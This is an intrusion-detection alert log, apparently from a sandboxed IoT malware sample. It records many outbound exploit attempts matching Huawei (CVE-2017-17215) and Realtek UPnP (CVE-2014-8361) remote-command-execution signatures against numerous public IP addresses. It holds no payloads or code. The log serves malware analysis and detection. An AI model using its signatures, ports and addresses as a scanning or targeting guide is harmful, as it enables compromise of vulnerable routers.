                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349837215192.168.2.1441.37.255.127
                                                07/20/24-23:05:36.581538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655037215192.168.2.14197.168.201.41
                                                07/20/24-23:05:59.093934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23685252869192.168.2.1482.141.157.248
                                                07/20/24-23:05:37.445004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396252869192.168.2.1452.248.88.164
                                                07/20/24-23:05:59.445692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4751652869192.168.2.14168.45.23.98
                                                07/20/24-23:05:57.947146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4972252869192.168.2.1497.30.113.63
                                                07/20/24-23:06:01.105390TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24483652869192.168.2.14198.213.67.23
                                                07/20/24-23:05:34.622609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.14190.164.230.172
                                                07/20/24-23:06:18.662067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.14197.171.188.166
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14197.86.146.223
                                                07/20/24-23:05:37.524280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376652869192.168.2.14168.85.33.243
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605437215192.168.2.1441.151.54.222
                                                07/20/24-23:05:57.983224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24227852869192.168.2.14107.117.156.40
                                                07/20/24-23:05:35.498293TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5130852869192.168.2.14119.83.111.97
                                                07/20/24-23:05:35.860422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5034252869192.168.2.14182.202.245.171
                                                07/20/24-23:05:52.551649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967052869192.168.2.14220.104.129.24
                                                07/20/24-23:06:05.500663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5780452869192.168.2.14147.116.212.99
                                                07/20/24-23:06:21.718589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24346252869192.168.2.1459.77.93.94
                                                07/20/24-23:05:38.470683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613656252869192.168.2.1454.192.129.153
                                                07/20/24-23:06:01.934329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591852869192.168.2.14186.11.211.163
                                                07/20/24-23:05:57.982999TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4717852869192.168.2.1496.70.6.41
                                                07/20/24-23:05:35.610945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614506852869192.168.2.14131.209.58.23
                                                07/20/24-23:05:36.577316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14187.64.166.86
                                                07/20/24-23:05:59.408866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4651052869192.168.2.14203.77.85.241
                                                07/20/24-23:07:34.791351TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4106252869192.168.2.1412.208.13.200
                                                07/20/24-23:06:09.812176TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24736052869192.168.2.14103.38.73.32
                                                07/20/24-23:05:57.342606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613612252869192.168.2.14141.5.120.100
                                                07/20/24-23:05:57.513503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614237652869192.168.2.14130.184.173.39
                                                07/20/24-23:06:01.285913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5885452869192.168.2.14219.6.222.246
                                                07/20/24-23:05:45.782282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614467452869192.168.2.1442.117.19.18
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095037215192.168.2.1441.127.195.65
                                                07/20/24-23:05:36.317008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615370052869192.168.2.1480.164.32.127
                                                07/20/24-23:05:58.758912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532852869192.168.2.1447.169.160.149
                                                07/20/24-23:06:07.310437TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4734852869192.168.2.144.132.221.115
                                                07/20/24-23:05:59.042861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4587852869192.168.2.14176.19.123.19
                                                07/20/24-23:05:59.377287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3714252869192.168.2.14139.245.84.27
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3505452869192.168.2.1425.34.210.225
                                                07/20/24-23:05:36.431582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614453452869192.168.2.1423.55.138.59
                                                07/20/24-23:06:06.209030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23998452869192.168.2.14217.194.22.37
                                                07/20/24-23:05:50.515352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977837215192.168.2.14157.42.25.123
                                                07/20/24-23:06:04.439088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5379852869192.168.2.14204.250.199.135
                                                07/20/24-23:05:38.750662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5187452869192.168.2.1448.109.149.149
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691037215192.168.2.14150.200.98.83
                                                07/20/24-23:06:55.981552TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23348052869192.168.2.14115.14.197.229
                                                07/20/24-23:05:58.913916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832252869192.168.2.1496.70.6.41
                                                07/20/24-23:05:59.708489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615143452869192.168.2.14174.36.34.226
                                                07/20/24-23:06:09.741345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615287452869192.168.2.1485.18.47.80
                                                07/20/24-23:06:03.206868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615287452869192.168.2.14114.102.232.116
                                                07/20/24-23:07:02.655350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4742052869192.168.2.1471.167.69.80
                                                07/20/24-23:05:59.109608TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616096052869192.168.2.1478.124.39.8
                                                07/20/24-23:05:40.342827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4696852869192.168.2.14105.51.193.210
                                                07/20/24-23:05:48.775023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451837215192.168.2.1441.95.67.116
                                                07/20/24-23:06:53.637724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615614652869192.168.2.1498.219.161.225
                                                07/20/24-23:05:40.361541TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25485452869192.168.2.14208.42.152.137
                                                07/20/24-23:05:59.333908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613772252869192.168.2.1453.235.185.131
                                                07/20/24-23:05:48.807124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845037215192.168.2.1441.227.205.171
                                                07/20/24-23:06:14.563767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6076852869192.168.2.14114.127.42.181
                                                07/20/24-23:06:02.646553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25463652869192.168.2.1458.94.23.51
                                                07/20/24-23:05:35.830692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779052869192.168.2.14155.49.251.8
                                                07/20/24-23:05:45.681680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571652869192.168.2.14157.170.39.12
                                                07/20/24-23:05:58.929504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6066652869192.168.2.14117.34.159.68
                                                07/20/24-23:06:06.458215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5127652869192.168.2.1498.107.150.15
                                                07/20/24-23:05:59.132842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3640252869192.168.2.14209.32.8.160
                                                07/20/24-23:07:26.028529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5102452869192.168.2.1434.38.81.91
                                                07/20/24-23:05:40.467316TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24077652869192.168.2.1449.30.236.251
                                                07/20/24-23:05:42.220682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990037215192.168.2.14197.158.46.80
                                                07/20/24-23:06:19.828184TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23999052869192.168.2.14216.88.74.6
                                                07/20/24-23:05:58.963945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286252869192.168.2.14136.6.40.211
                                                07/20/24-23:06:01.836795TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24986852869192.168.2.1417.95.5.182
                                                07/20/24-23:06:11.223856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5007852869192.168.2.1465.72.189.242
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913237215192.168.2.14197.239.220.240
                                                07/20/24-23:05:56.421312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922637215192.168.2.14157.12.215.59
                                                07/20/24-23:05:46.284824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5574052869192.168.2.14159.81.180.197
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506437215192.168.2.14157.26.125.186
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578837215192.168.2.14197.80.221.166
                                                07/20/24-23:05:35.752175TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615250852869192.168.2.14217.161.186.84
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606437215192.168.2.1441.254.204.37
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970437215192.168.2.1441.48.198.170
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365837215192.168.2.14157.205.67.171
                                                07/20/24-23:06:50.167569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614137252869192.168.2.14203.193.57.242
                                                07/20/24-23:05:37.520621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24051452869192.168.2.14197.23.60.58
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670637215192.168.2.14197.180.186.174
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294837215192.168.2.14186.106.76.92
                                                07/20/24-23:05:38.522009TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614985252869192.168.2.1467.38.12.24
                                                07/20/24-23:06:13.292975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3446852869192.168.2.14149.232.29.216
                                                07/20/24-23:07:11.472742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683437215192.168.2.1441.239.97.98
                                                07/20/24-23:06:25.985417TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613608452869192.168.2.14203.104.19.10
                                                07/20/24-23:07:36.617416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24905852869192.168.2.1466.1.85.90
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502637215192.168.2.14157.221.191.76
                                                07/20/24-23:06:23.534447TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25299452869192.168.2.14141.143.83.70
                                                07/20/24-23:05:37.441296TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25264252869192.168.2.141.200.111.50
                                                07/20/24-23:05:58.875074TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23675852869192.168.2.1431.155.247.160
                                                07/20/24-23:05:37.445623TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25683852869192.168.2.14135.221.59.240
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831437215192.168.2.14200.251.248.110
                                                07/20/24-23:05:52.443193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5475252869192.168.2.14150.141.141.200
                                                07/20/24-23:06:18.458631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387852869192.168.2.1496.23.20.79
                                                07/20/24-23:05:57.526744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25700652869192.168.2.14221.205.117.86
                                                07/20/24-23:05:58.930252TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24718852869192.168.2.14110.237.107.43
                                                07/20/24-23:05:36.323670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639037215192.168.2.14157.157.175.235
                                                07/20/24-23:05:37.447263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24986052869192.168.2.14183.106.204.162
                                                07/20/24-23:05:40.246053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616083652869192.168.2.1453.151.134.25
                                                07/20/24-23:06:27.674364TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613296652869192.168.2.14140.180.17.66
                                                07/20/24-23:06:06.465385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041637215192.168.2.14157.138.206.123
                                                07/20/24-23:06:23.212855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5373452869192.168.2.1485.157.41.241
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337637215192.168.2.14197.205.1.129
                                                07/20/24-23:05:47.108564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624837215192.168.2.14197.211.64.143
                                                07/20/24-23:06:18.422288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337652869192.168.2.14154.119.243.101
                                                07/20/24-23:05:40.433285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5175452869192.168.2.1497.213.55.119
                                                07/20/24-23:05:40.353037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5043852869192.168.2.14171.41.249.212
                                                07/20/24-23:05:37.452253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24455252869192.168.2.14124.61.165.111
                                                07/20/24-23:05:57.844842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4089252869192.168.2.1457.248.59.177
                                                07/20/24-23:06:01.888773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614211052869192.168.2.1461.195.84.60
                                                07/20/24-23:05:40.326250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809452869192.168.2.1480.50.203.132
                                                07/20/24-23:06:15.478723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23402852869192.168.2.14190.26.67.211
                                                07/20/24-23:05:59.171817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459652869192.168.2.14115.195.128.65
                                                07/20/24-23:06:15.435068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338652869192.168.2.1444.110.25.85
                                                07/20/24-23:05:40.365777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25496252869192.168.2.14125.204.161.195
                                                07/20/24-23:05:57.334876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365852869192.168.2.14130.184.173.39
                                                07/20/24-23:06:00.037207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959452869192.168.2.14190.242.197.218
                                                07/20/24-23:05:52.515632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4109052869192.168.2.1498.131.72.180
                                                07/20/24-23:05:39.592985TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5057652869192.168.2.1417.102.178.46
                                                07/20/24-23:06:06.576731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814052869192.168.2.14132.41.56.108
                                                07/20/24-23:05:45.062886TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615565452869192.168.2.1457.176.228.98
                                                07/20/24-23:06:15.141369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140452869192.168.2.14192.15.83.19
                                                07/20/24-23:05:39.159544TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614309452869192.168.2.1450.25.2.217
                                                07/20/24-23:05:50.515352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884837215192.168.2.1444.218.162.144
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985037215192.168.2.1441.70.125.198
                                                07/20/24-23:05:59.708489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615422652869192.168.2.1447.169.160.149
                                                07/20/24-23:05:45.447173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494437215192.168.2.1441.1.216.176
                                                07/20/24-23:05:52.508651TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25084252869192.168.2.1469.202.5.98
                                                07/20/24-23:06:01.176056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23986252869192.168.2.1498.44.175.48
                                                07/20/24-23:06:15.553063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5127852869192.168.2.1465.82.221.155
                                                07/20/24-23:05:50.515352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765237215192.168.2.1441.182.78.194
                                                07/20/24-23:06:05.101340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25994252869192.168.2.14104.64.121.105
                                                07/20/24-23:05:46.887482TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001252869192.168.2.1476.37.36.156
                                                07/20/24-23:05:46.308037TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614355252869192.168.2.1494.25.11.127
                                                07/20/24-23:05:46.767175TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4808652869192.168.2.14131.101.133.159
                                                07/20/24-23:06:01.890086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24905652869192.168.2.1443.191.221.139
                                                07/20/24-23:05:34.624854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864437215192.168.2.1445.182.212.164
                                                07/20/24-23:05:37.476168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25375052869192.168.2.1437.150.102.99
                                                07/20/24-23:06:04.098403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6087252869192.168.2.1435.126.110.108
                                                07/20/24-23:05:57.334876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5752452869192.168.2.14108.121.255.112
                                                07/20/24-23:06:02.495090TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25759052869192.168.2.14217.74.204.181
                                                07/20/24-23:06:25.686672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4583252869192.168.2.14133.4.216.224
                                                07/20/24-23:05:56.421312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852837215192.168.2.14157.180.228.137
                                                07/20/24-23:06:15.755429TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24730452869192.168.2.14143.160.225.122
                                                07/20/24-23:05:56.120599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990437215192.168.2.14157.163.110.116
                                                07/20/24-23:06:06.638799TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25455852869192.168.2.14211.118.237.168
                                                07/20/24-23:05:39.055909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585037215192.168.2.1441.252.42.114
                                                07/20/24-23:06:00.099234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614704452869192.168.2.14100.130.98.116
                                                07/20/24-23:05:34.664378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897237215192.168.2.1444.66.223.184
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957237215192.168.2.14157.13.175.113
                                                07/20/24-23:06:31.730220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615106052869192.168.2.1436.116.106.59
                                                07/20/24-23:05:58.384426TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24135452869192.168.2.14195.118.211.22
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349437215192.168.2.1441.146.165.184
                                                07/20/24-23:05:45.435096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450837215192.168.2.14157.26.209.11
                                                07/20/24-23:06:34.627679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4936052869192.168.2.1469.67.122.17
                                                07/20/24-23:06:20.646576TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4327052869192.168.2.1423.188.123.27
                                                07/20/24-23:05:56.671976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4943852869192.168.2.1485.19.89.54
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843637215192.168.2.1496.132.102.53
                                                07/20/24-23:05:45.792506TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613553252869192.168.2.14203.182.119.62
                                                07/20/24-23:06:08.034671TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25732252869192.168.2.148.163.140.146
                                                07/20/24-23:05:52.460913TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25650852869192.168.2.14207.195.83.121
                                                07/20/24-23:05:52.557712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138652869192.168.2.14196.229.8.153
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342637215192.168.2.14197.194.11.25
                                                07/20/24-23:05:40.406154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23440452869192.168.2.1434.187.124.168
                                                07/20/24-23:06:04.437943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357852869192.168.2.14101.111.118.23
                                                07/20/24-23:05:37.445623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5744252869192.168.2.1460.73.199.117
                                                07/20/24-23:05:45.770020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644252869192.168.2.1451.1.181.74
                                                07/20/24-23:06:03.453957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407437215192.168.2.14111.84.153.82
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897237215192.168.2.14157.213.228.184
                                                07/20/24-23:05:56.993302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614135052869192.168.2.14107.117.156.40
                                                07/20/24-23:06:02.733116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24074252869192.168.2.14117.178.148.207
                                                07/20/24-23:05:37.542495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897452869192.168.2.14206.53.82.225
                                                07/20/24-23:06:01.903540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23393452869192.168.2.1475.226.205.63
                                                07/20/24-23:05:48.763322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123637215192.168.2.1441.44.52.109
                                                07/20/24-23:05:52.488878TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25723452869192.168.2.1448.13.21.145
                                                07/20/24-23:05:38.939891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388837215192.168.2.1441.182.179.206
